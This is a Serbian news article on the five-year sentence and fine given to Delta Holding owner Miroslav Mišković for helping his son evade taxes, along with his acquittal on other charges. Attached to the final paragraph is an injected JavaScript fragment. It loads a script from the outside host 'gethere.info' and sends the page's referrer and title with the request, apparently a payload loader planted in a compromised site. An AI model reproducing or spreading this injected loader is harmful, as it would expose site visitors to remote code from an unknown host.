SPECIJALNI SUD: Mišković osuđen na 5 godina zatvora

SPECIJALNI SUD: Mišković osuđen na 5 godina zatvora

FOTO TANJUG / SAVA RADOVANOVIC


Miroslav Mišković, vlasnik “Delta holdinga”, osuđen je na pet godina zatvora i novčanu kaznu od 8 miliona dinara za pomaganje u utaji poreza

BEOGRAD – Specijalni sud u Beogradu osudio je danas na pet godina zatvora i novčanu kaznu od osam miliona dinara vlasnika Delta holdinga Miroslava Miškovića, jer je pomogao sinu Marku da utaji porez po odbitku od oko 320,3 miliona dinara, odnosno oko tri miliona evra.

Istom odlukom Mišković je danas oslobođen optužbi da je oštetio putarska preduzeća, odnosno da je finansijskim poslovanjem izvlačio novac iz njih. Na ovu presudu i Mišković i tužilaštvo za organizovani kriminal imaju pravo da ulože žalbu Apelacionom sudu u Beogradu.

Sudija Maja Ilić rekla je da je sudsko veće odluku donelo jednoglasno. Vlasnik Delte nije prisustvovao izricanju presude, na šta i nije obavezan.

Sudija Maja Ilić rekla je u obrazloženju presude da je nesumnjivio utvrđeno da je Miroslav Mišković pomagao sinu u donošenju strateških odluka.

“Nema dileme da je Miroslav Mišković pomagao Marku. On mu je rekao da kupi akcije po jednoj, a proda po drugoj ceni”, navela je sudija.

Prema njenim rečima, Marko Mišković je pokušao da minimizira svoju ulogu, a iza njegovih poteza stoji Miroslav Mišković. On je donosio strateške odluke kada je u pitanju Mera investment fond (Markovo preduzeće).

Sudija je ukazala da je odluku o prodaji 41 odsto akcija vlasniku Nibens grupe Milu Đuraškoviću doneo Miroslav Mišković, kako je sam rekao, za “tri sekunde”.

Marko Mišković je 25. februara osuđen zbog utaje poreza na tri i po godine zatvora i novčanu kaznu od osam miliona dinara, uz obavezu da njegovo preduzeće “Merainvest” plati porez od oko 320,3 miliona dinara, ali je kao i otac oslobođen optužbi za izvlačenje para iz putarskih preduzeća.

Miroslavu Miškoviću je suđenje zbog zdravstvenih problema u decembru 2015. godine razdvojeno od procesa protiv njegovog sina i ostalih optuženih. Miškovići su bili su uhapšeni u decembru 2012. godine.

Posle višemesečnog boravka u pritvoru pušteni su da se brane sa slobode, uz jemstva od više miliona evra, a pasoši su im i dalje u sudskom depozitu i ne mogu da napuste boravište bez odobrenja suda.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

+ Trenutno nema komentara

Dodajte komentar